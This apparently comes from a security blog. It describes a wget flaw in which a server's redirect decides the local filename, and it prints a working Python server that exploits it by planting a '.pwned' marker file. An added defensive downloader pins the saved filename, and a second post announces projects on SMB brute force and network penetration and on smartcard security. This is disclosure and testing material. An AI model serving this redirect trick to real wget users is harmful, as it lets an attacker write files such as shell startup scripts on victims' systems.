WGET file redirect exploit

While browsing full-disclosure this morning I noticed a vulnerability in WGET and decided to write a working exploit for it to show the issue.

The problem is, if you request a file, for example:
and the server returns a redirect to say
WGET will store the downloaded file with the filename of ‘malicious_filename’!
Exploit code to test if your system is vulnerable:

from http.server import BaseHTTPRequestHandler, HTTPServer
import time

HOST_NAME = "0.0.0.0"
PORT_NUMBER = 80

TARGET_FILENAME = ".pwned"
TARGET_CONTENT = b"VULNERABLE SYSTEM"


class wget_exploit(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path != "/%s" % (TARGET_FILENAME):
            # do our redirect
            self.send_response(301)  # send the redirect
            self.send_header("Location", TARGET_FILENAME)  # redirect to the target
            self.end_headers()

            self.wfile.write(b"WOOPSPLOIT by XPN (http://xpnsbraindump.blogspot.com)")

        else:
            # send exploited file with new filename
            self.send_response(200)
            self.end_headers()

            self.wfile.write(TARGET_CONTENT)


if __name__ == '__main__':
    server_class = HTTPServer
    httpd = server_class((HOST_NAME, PORT_NUMBER), wget_exploit)
    print(time.asctime(), "Server Starts - %s:%s" % (HOST_NAME, PORT_NUMBER))
    try:
        # serve until interrupted with Ctrl-C
        httpd.serve_forever()
    except KeyboardInterrupt:
        pass

    httpd.server_close()
    print(time.asctime(), "Server Stops - %s:%s" % (HOST_NAME, PORT_NUMBER))
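
A defensive counterpart to the test server above, as an added example that is not part of the original post: a downloader that follows redirects but names the saved file from the URL that was requested, so the server's Location header never chooses the local filename. The loopback server, report.txt and all function names are constructed for this illustration.

```python
import os
import tempfile
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote, urlsplit

class RedirectDemo(BaseHTTPRequestHandler):
    """Constructed loopback server: redirects every request to /.pwned."""
    def do_GET(self):
        body = b"VULNERABLE SYSTEM" if self.path == "/.pwned" else b""
        self.send_response(200 if body else 301)
        if not body:
            self.send_header("Location", "/.pwned")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)
    def log_message(self, *args):  # keep the demo quiet
        pass

def safe_local_name(requested_url, default="index.html"):
    """Name the file from the URL the user typed, never from a redirect."""
    name = unquote(urlsplit(requested_url).path).rsplit("/", 1)[-1]
    # Refuse empty names, dotfiles (.bashrc, .wgetrc) and backslash paths.
    if not name or name.startswith(".") or "\\" in name:
        return default
    return name

def fetch(requested_url, dest_dir):
    """Follow redirects, but save under the requested name only."""
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
    with opener.open(requested_url, timeout=5) as resp:
        final_url, data = resp.geturl(), resp.read()
    path = os.path.join(dest_dir, safe_local_name(requested_url))
    with open(path, "xb") as fh:  # "x" mode: never overwrite an existing file
        fh.write(data)
    return os.path.basename(path), final_url

def demo():
    """Request /report.txt from the redirecting server; report what was saved."""
    server = HTTPServer(("127.0.0.1", 0), RedirectDemo)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        url = "http://127.0.0.1:%d/report.txt" % server.server_address[1]
        dest = tempfile.mkdtemp()
        saved, final_url = fetch(url, dest)
        return saved, final_url.rsplit("/", 1)[-1], os.listdir(dest)
    finally:
        server.shutdown()
        server.server_close()
```

Calling demo() returns the saved name, the name the redirect pointed at, and the directory listing. With wget itself, passing -O with an explicit filename pins the output name in the same way.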


The Future Of XPN’s Brain Dump

Well, today I registered a new YouTube profile. The aim is to have some videos up to demonstrate some security features and some of the programs I’ve been working on visually rather than describing them.
My YouTube channel can be found at http://www.youtube.com/user/xpnsecurity. Please feel free to subscribe and watch the Twitter feed for any updates.
Right now I’m working on 2 projects.
My first project will focus on SMB security. This is something that I have been meaning to do for a while, as SMB is always around us. Even Linux users find Samba installed on many distributions. The areas that I will be focusing on with this will be:
  • Core SMB protocol details
  • SMB authentication and brute force
  • Auto penetration of a network using SMB
  • SMB misconfiguration
The second project that I am working on is quite a difficult one for me as I haven’t touched hardware in quite a while. I will be focusing on smartcard security (ISO 7816 for those interested). Again, this will focus on areas including:
  • Smart Card interfacing
  • Interfacing with different card classes
  • Embedded security and weaknesses
I am hoping to dedicate more time to this blog and keep it more structured, as the aim is now to try and turn this hobby into a career. As always, if you have any comments I would love to hear them.